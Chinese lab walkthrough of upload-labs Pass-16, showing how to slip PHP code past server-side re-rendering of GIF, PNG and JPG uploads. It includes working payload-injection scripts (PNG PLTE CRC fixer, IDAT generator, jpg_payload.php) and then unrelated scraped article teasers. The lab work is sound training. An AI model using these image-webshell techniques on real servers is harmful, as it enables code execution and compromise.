upload-labs之第十六关

Pass16

打开第十六关，任务什么的还是没有区别。那就看看提示。

渲染了图片？啥是渲染啊，它对上传漏洞防御能有啥用啊？带着一堆的问号我默默打开了源码。

$is_upload = false;$msg = null;if (isset($_POST['submit'])){// 获得上传文件的基本信息，文件名，类型，大小，临时文件路径$filename = $_FILES['upload_file']['name'];$filetype = $_FILES['upload_file']['type'];$tmpname = $_FILES['upload_file']['tmp_name'];$target_path=UPLOAD_PATH.'/'.basename($filename);// 获得上传文件的扩展名$fileext= substr(strrchr($filename,"."),1);//判断文件后缀与类型，合法才进行上传操作if(($fileext == "jpg") && ($filetype=="image/jpeg")){if(move_uploaded_file($tmpname,$target_path)){//使用上传的图片生成新的图片$im = imagecreatefromjpeg($target_path);if($im == false){$msg = "该文件不是jpg格式的图片！";@unlink($target_path);}else{//给新图片指定文件名srand(time());$newfilename = strval(rand()).".jpg";//显示二次渲染后的图片（使用用户上传图片生成的新图片）$img_path = UPLOAD_PATH.'/'.$newfilename;imagejpeg($im,$img_path);@unlink($target_path);$is_upload = true;}} else {$msg = "上传出错！";}}else if(($fileext == "png") && ($filetype=="image/png")){if(move_uploaded_file($tmpname,$target_path)){//使用上传的图片生成新的图片$im = imagecreatefrompng($target_path);if($im == false){$msg = "该文件不是png格式的图片！";@unlink($target_path);}else{//给新图片指定文件名srand(time());$newfilename = strval(rand()).".png";//显示二次渲染后的图片（使用用户上传图片生成的新图片）$img_path = UPLOAD_PATH.'/'.$newfilename;imagepng($im,$img_path);@unlink($target_path);$is_upload = true;               }} else {$msg = "上传出错！";}}else if(($fileext == "gif") && ($filetype=="image/gif")){if(move_uploaded_file($tmpname,$target_path)){//使用上传的图片生成新的图片$im = imagecreatefromgif($target_path);if($im == false){$msg = "该文件不是gif格式的图片！";@unlink($target_path);}else{//给新图片指定文件名srand(time());$newfilename = strval(rand()).".gif";//显示二次渲染后的图片（使用用户上传图片生成的新图片）$img_path = UPLOAD_PATH.'/'.$newfilename;imagegif($im,$img_path);@unlink($target_path);$is_upload = true;}} else {$msg = "上传出错！";}}else{$msg = "只允许上传后缀为.jpg|.png|.gif的图片文件！";}}

从源码来看的话，服务器先是对上传的临时文件类型做了检查，是jpg、png、gif中的任意一种之后才进行上传操作。

在上传操作中，使用了imagecreatefrom 系列函数来获取原文件的数据，创建一个新的图像文件。再将得到的这个新的图像文件重命名。

1、imagecreatefromgif()：创建一块画布，并从 GIF 文件或 URL 地址载入一副图像

2、imagecreatefromjpeg()：创建一块画布，并从 JPEG 文件或 URL 地址载入一副图像

3、imagecreatefrompng()：创建一块画布，并从 PNG 文件或 URL 地址载入一副图像

所以到这里我觉得这个图片渲染的意思就是服务器没有保存我们上传的源文件，而是将源文件的内容取出来重新新建了一个文件并且重命名了。

那么意义何在呐？东西还是那个东西。不就换了一个名字吗？接下来我直接上传之前那种图片马（为了效果更直观把一句话换成了phpinfo()），发现马上打脸了。

这次我们先使用gif的图片马（应为对于png和jpg更容易绕过）

可以看到gif图片马是成功上传了的，但是在用文件包含时却没有达到预期的效果，没有执行我们想要执行的phpinfo()。

这是怎么回事呐？我用HxD Hex Editor（16进制编辑器）打开上传之前的shell.gif和服务器中的31717.gif对比发现了问题。

这是shell.gif的十六进制显示：

这是服务器上的31717.gif的十六进制显示：

很明显可以看到服务器上文件末尾的php代码不见了。我想这就是图片渲染干的好事吧。那我们怎么才能让服务器中的文件依然保存我们想要执行的代码呐？

关于gif的渲染绕过，我们只要找到渲染前后没有变化的位置，然后将php代码写进去，就可以成功上传带有php代码的图片了。

通过两个文件的仔细对比，确实发现了这样的区域。我们直接在HXD中对文件插入代码。

保存之后再进行上传

这个10851.gif是修改之后重新上传到服务器的文件，再次包含试试

这次直接就成功了，这么看来对于gif的二次渲染我们是绕过了。接下来看看png的绕过。

png的二次渲染的绕过并不能像gif那样简单。

png文件组成：

png图片由3个以上的数据块组成。png定义了两种类型的数据块，一种是称为关键数据块(critical chunk)，这是标准的数据块。另一种叫做辅助数据块(ancillary chunks)，这是可选的数据块。关键数据块定义了3个标准数据块(IHDR,IDAT, IEND)，每个PNG文件都必须包含它们。

数据块结构：

CRC(cyclic redundancy check)域中的值是对Chunk Type Code域和Chunk Data域中的数据进行计算得到的。CRC具体算法定义在ISO 3309和ITU-T V.42中，其值按下面的CRC码生成多项式进行计算：

x32+x26+x23+x22+x16+x12+x11+x10+x8+x7+x5+x4+x2+x+1

IHDR

数据块IHDR(header chunk)：它包含有PNG文件中存储的图像数据的基本信息，并要作为第一个数据块出现在PNG数据流中，而且一个PNG数据流中只能有一个文件头数据块。

文件头数据块由13字节组成，它的格式如下所示。

PLTE

调色板PLTE数据块是辅助数据块,对于索引图像，调色板信息是必须的，调色板的颜色索引从0开始编号，然后是1、2……，调色板的颜色数不能超过色深中规定的颜色数（如图像色深为4的时候，调色板中的颜色数不可以超过2^4=16），否则，这将导致PNG图像不合法。

IDAT

图像数据块IDAT(image data chunk)：它存储实际的数据，在数据流中可包含多个连续顺序的图像数据块。

IDAT存放着图像真正的数据信息，因此，如果能够了解IDAT的结构，我们就可以很方便的生成PNG图像

IEND

图像结束数据IEND(image trailer chunk)：它用来标记PNG文件或者数据流已经结束，并且必须要放在文件的尾部。

如果我们仔细观察PNG文件，我们会发现，文件的结尾12个字符看起来总应该是这样的：

00 00 00 00 49 45 4E 44 AE 42 60 82

了解了png图像文件的结构之后，就能针对性的绕过二次渲染了。这里有两种方法。

1、写入PLTE数据块

php底层在对PLTE数据块验证的时候,主要进行了CRC校验.所以可以再chunk data域插入php代码,然后重新计算相应的crc值并修改即可。

这种方式只针对索引彩色图像的png图片才有效，在选取png图片时可根据IHDR数据块的color type辨别。（03为索引彩色图像）

这里已经在图片中写下了php代码，接下来计算PLTE数据块的CRC。

CRC脚本：

import binasciiimport repng = open(r'2.png','rb')a = png.read()png.close()hexstr = binascii.b2a_hex(a)''' PLTE crc '''data =  '504c5445'+ re.findall('504c5445(.*?)49444154',hexstr)[0]crc = binascii.crc32(data[:-16].decode('hex')) & 0xffffffffprint hex(crc)

运行结果：

526579b0

然后再去修改CRC值

将修改后的图片保存再上传尝试。

这是上传至服务器后的图片，先打开看看是否还存在代码。

可以看到依然存在，用文件包含也是成功解析的。

2、写入IDAT数据块

这里有国外大牛写的脚本，直接拿来运行即可。

<?php$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,0x66, 0x44, 0x50, 0x33);$img = imagecreatetruecolor(32, 32);for ($y = 0; $y < sizeof($p); $y += 3) {$r = $p[$y];$g = $p[$y+1];$b = $p[$y+2];$color = imagecolorallocate($img, $r, $g, $b);imagesetpixel($img, round($y / 3), 0, $color);}imagepng($img,'./cs.png');?>

运行后得到cs.png，上传后再下载到本地打开如下图：

对于jpg的绕过也是用的国外大佬的脚本 jpg_payload.php

<?php/*The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().It is necessary that the size and quality of the initial image are the same as those of the processed image.1) Upload an arbitrary image via secured files upload script2) Save the processed image and launch:jpg_payload.php <jpg_name.jpg>In case of successful injection you will get a specially crafted image, which should be uploaded again.Since the most straightforward injection method is used, the following problems can occur:1) After the second processing the injected data may become partially corrupted.2) The jpg_payload.php script outputs "Something's wrong".If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.Sergey Bobrov @Black2Fan.See also:https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/*/$miniPayload = "<?=phpinfo();?>";if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {die('php-gd is not installed');}if(!isset($argv[1])) {die('php jpg_payload.php <jpg_name.jpg>');}set_error_handler("custom_error_handler");for($pad = 0; $pad < 1024; $pad++) {$nullbytePayloadSize = $pad;$dis = new DataInputStream($argv[1]);$outStream = file_get_contents($argv[1]);$extraBytes = 0;$correctImage = TRUE;if($dis->readShort() != 0xFFD8) {die('Incorrect SOI marker');}while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {$marker = $dis->readByte();$size = $dis->readShort() - 2;$dis->skip($size);if($marker === 0xDA) {$startPos = $dis->seek();$outStreamTmp =substr($outStream, 0, $startPos) .$miniPayload .str_repeat("\0",$nullbytePayloadSize) .substr($outStream, $startPos);checkImage('_'.$argv[1], $outStreamTmp, TRUE);if($extraBytes !== 0) {while((!$dis->eof())) {if($dis->readByte() === 0xFF) {if($dis->readByte !== 0x00) {break;}}}$stopPos = $dis->seek() - 2;$imageStreamSize = $stopPos - $startPos;$outStream =substr($outStream, 0, $startPos) .$miniPayload .substr(str_repeat("\0",$nullbytePayloadSize).substr($outStream, $startPos, $imageStreamSize),0,$nullbytePayloadSize+$imageStreamSize-$extraBytes) .substr($outStream, $stopPos);} elseif($correctImage) {$outStream = $outStreamTmp;} else {break;}if(checkImage('payload_'.$argv[1], $outStream)) {die('Success!');} else {break;}}}}unlink('payload_'.$argv[1]);die('Something\'s wrong');function checkImage($filename, $data, $unlink = FALSE) {global $correctImage;file_put_contents($filename, $data);$correctImage = TRUE;imagecreatefromjpeg($filename);if($unlink)unlink($filename);return $correctImage;}function custom_error_handler($errno, $errstr, $errfile, $errline) {global $extraBytes, $correctImage;$correctImage = FALSE;if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {if(isset($m[1])) {$extraBytes = (int)$m[1];}}}class DataInputStream {private $binData;private $order;private $size;public function __construct($filename, $order = false, $fromString = false) {$this->binData = '';$this->order = $order;if(!$fromString) {if(!file_exists($filename) || !is_file($filename))die('File not exists ['.$filename.']');$this->binData = file_get_contents($filename);} else {$this->binData = $filename;}$this->size = strlen($this->binData);}public function seek() {return ($this->size - strlen($this->binData));}public function skip($skip) {$this->binData = substr($this->binData, $skip);}public function readByte() {if($this->eof()) {die('End Of File');}$byte = substr($this->binData, 0, 1);$this->binData = substr($this->binData, 1);return ord($byte);}public function readShort() {if(strlen($this->binData) < 2) {die('End Of File');}$short = substr($this->binData, 0, 2);$this->binData = substr($this->binData, 2);if($this->order) {$short = (ord($short[1]) << 8) + ord($short[0]);} else {$short = (ord($short[0]) << 8) + ord($short[1]);}return $short;}public function eof() {return !$this->binData||(strlen($this->binData) === 0);}}?>

先随便找一个jpg图片，先上传至服务器然后再下载到本地保存为 shell.jpg

然后使用脚本处理shell.jpg,插入php代码,命令如下：

php jpg_payload.php shell.jpg

成功之后会生成payload_shell.jpg，把它重新上传。

将它用HXD打开查看，可以看到代码依旧存在

文件包含也可以正常解析

至此对于图像文件二次渲染的绕过就到此结束啦，因为比较难以理解并且实际操作麻烦所以就单独一篇来写。

本文参考：

Upload-Labs第Pass-16通关（二次渲染绕过）详解 - 付杰博客

查看全文
如若内容造成侵权/违法违规/事实不符，请联系编程学习网邮箱：809451989@qq.com进行投诉反馈，一经查实，立即删除！

linux7.0磁盘挂载
一些概念： 卷组：vg 卷：lv 卷里面放磁盘 vg/lv磁盘 Linux的目录挂载： Oracle挂载在vg上面，卷组下面可以添加卷。磁盘操作相关命令： 添加硬盘（关机添加硬盘，另一种技术叫热插拔…...
2024/5/2 16:25:47
NMCLI命令
NMCLI 说明命令行的网络管理工具语法 nmcli [OPTIONS...] {help | general | networking | radio | connection | device | agent | monitor} [COMMAND] [ARGUMENTS...]描述 nmcli is used to create, display, edit, delete, activate, and deactivate network conn…...
2024/5/7 4:41:46
2021.10.27 训练
Codeforces Round #750 (Div. 2）A - Luntik and Concerts题意：分析：代码：B - Luntik and Subsequences题意：分析：代码：C - Grandma Capa Knits a Scarf题意：分析：代码&am…...
2024/4/24 15:50:46
面试官：我们来聊聊Fragment和Activity
一丶Fragment 1 、谈一谈 Fragment 的生命周期？ 参考回答： Fragment 从创建到销毁整个生命周期中涉及到的方法依次为：onAttach()→onCreate()→ onCreateView()→onActivityCreated()→onStart()→onR esume()→onPause()→onStop()→onDe…...
2024/4/24 15:50:55
spring和springboot的区别
Spring： Spring框架为开发Java应用程序提供了全面的基础架构支持。它包含一些很好的功能，如依赖注入和开箱即用的模块，如：Spring JDBC 、Spring MVC 、Spring Security、 Spring AOP 、Spring ORM 、Spring Test，这些…...
2024/4/24 15:50:41
阿里前技术总监肝了N小时，整理了100+Android开源框架源码解析，拿去吧你
说到源码，大家脑海里可能浮现出四个字：我太难了。读源码貌似和我们遥不可及，因为在日常工作中，我们基本掌握在熟练的程度上，就能够满足工作需求，即便是想看源码，也会被源码复杂的逻辑拒之门外&a…...
2024/4/24 15:50:48
新世纪福音战士剧场版：终
阿里云网盘 https://www.aliyundrive.com/s/YgNQFiMVwkQ...
2024/4/24 15:50:42
Appium基础操作
1.uiautomatorviewer 1.手机控件查看工具uiautomatorviewer 简介：用来扫描和分析Android应用程序的UI空间的工具 2.如何使用 1.进入SDK目录下的tools目录，打开uiautomatorviewer 2.电脑连接真机或模拟器 3.启动待测试app 4.点击uiautomatorviewer的左上…...
2024/5/6 22:21:14
关于Java堆栈的理解与说明
说到java的堆和栈就想起来了，java内存中的分配结构。作为一个Java的程序员，我们肯定知道Java的程序是运行在java虚拟机上的，也就是平时所说的JVM。程序中所有的方法、变量、常量、实例、静态存储都是由JVM在内存中进行分配的。 1. 寄存器…...
2024/5/4 23:52:25
基于注解的数据脱敏
利用 JSON 序列化 1 添加依赖默认的情况下，如果当前项目已经添加了 spring-web 包或者 spring-boot-starter-web包。因为这些 jar 包已经集成了 jackson 相关包，因此无需重复依赖。如果当前项目没有 jackson 包，可以通过如下方式进行添加…...
2024/4/24 15:57:14
CTF-Crypto-RSA整理
rsa基本参数 N：大整数N，我们称之为模数（modulus） p 和 q ：大整数N的两个因子（factor） e 和 d：互为模反数的两个指数（exponent） c 和 m：分别是密文…...
2024/4/30 21:29:24
【转载】Go常见错误集锦之混淆slice中的长度(length)和容量(capacity) - Go切片make()初始化相关问题解惑
本文是本菜鸟在学习go的过程中遇到了切片初始化的问题，搜索了很多之后找到的最好回答，转载至C站。原文链接：Go常见错误集锦之混淆slice中的长度(length)和容量(capacity) - 知乎侵删。以下是原文： 本文是对《100 Go Mistac…...
2024/5/3 23:06:03
孙鑫VC学习笔记：第十二讲 (一) 介绍常量指针、指针常量，文本、二进制文件
◆指向常量的指针它指向的内容是常量，不能修改；但是指针本身存放的是指针值，可以修改。char ch[5]="list" 这种赋值形式只能在数组定义的同时进行。常量字符串会自动加上/0，所以字符串长度为五通常，如果想用指针传参，通常会将形参声明的指向常量的指针类型当…...
2024/4/27 16:33:54
STM32-SPI通信
1 SPI的基本介绍 1.1 SPI的简介 SPI，是英语Serial Peripheral interface的缩写，顾名思义就是串行外围设备接口，是Motorola首先在其MC68HCXX系列处理器上定义的。 SPI主要用于MCU和一些外设进行通信的场合，例如&#xff1…...
2024/4/27 19:11:42
Go基础：下划线“_”、变量和常量、数组、slice
目录前言：Go语言的设计初衷Go语言很特别Go语言的主要特征GO概览Go基础Go语言声明下划线（很特殊）变量声明常量声明数组切片Slice前言：Go语言的设计初衷针对其他语言的痛点进行设计并加入并发编程为大数据、微服务、并发而生的通用编程语言Go语言很特别没有“对象”，没有继承…...
2024/4/27 16:29:30
2021年12月大学英语B统考题库网考试题(完整版)
全国网络教育、远程教育、奥鹏教育大学英语b统考、计算机应用基础统考 2021年12月远程网络教育大学英语b、计算机应用基础整套原题库，覆盖90%以上，精心整理归类，全中文翻译，重点题必抽80分，视频教程讲解，复…...
2024/4/27 14:47:28
JAVA的入门学习
目录了解java语言 1.了解JDK，JVM，JRE 2.修饰符 3.固定写法 4.编译过程 5.注释 6.打印方法数据类型和运算符整形变量int 长整型 long 双精度浮点型变量double 单精度浮点型变量 float 字符类型变量字节类型变量短整型变量了解java…...
2024/4/27 16:53:50
Gillespie算法简介
最近在模拟化学体系随时间变化的过程中，要用到Gillespie算法。因此，特别去学习了一下，在这里做一下记录。常规MC和KMC 首先，Gillespie算法是一种非常常用的随机方法，也被称为动态蒙特卡洛方法(KMC,Kinetic Monte C…...
2024/4/27 21:11:34
CSS餐厅小游戏练习1~32关（附答案和链接）
前言：CSS3众多基础常见的选择器都可以小游戏中学习，每天刷一遍，辅助记忆，做好熟练运用CSS3的第一步。小游戏链接：CSS3餐厅练习玩法：利用各种选择器和选择器之间的关系选中抖动的物体即可通关文章目录第…...
2024/5/5 5:41:14
HTML基础知识
前端前端主要使用HTML、CSS、JavaScript这三剑客来进行开发。前端主要负责页面内容的呈现，页面效果的制作，以及各种交互效果的实现。前端能做的不止是网页随着现在前端技术的发展，各种跨平台方案的涌现，大前端的潮流已经是不…...
2024/4/27 18:16:25

upload-labs之第十六关

相关文章

最新文章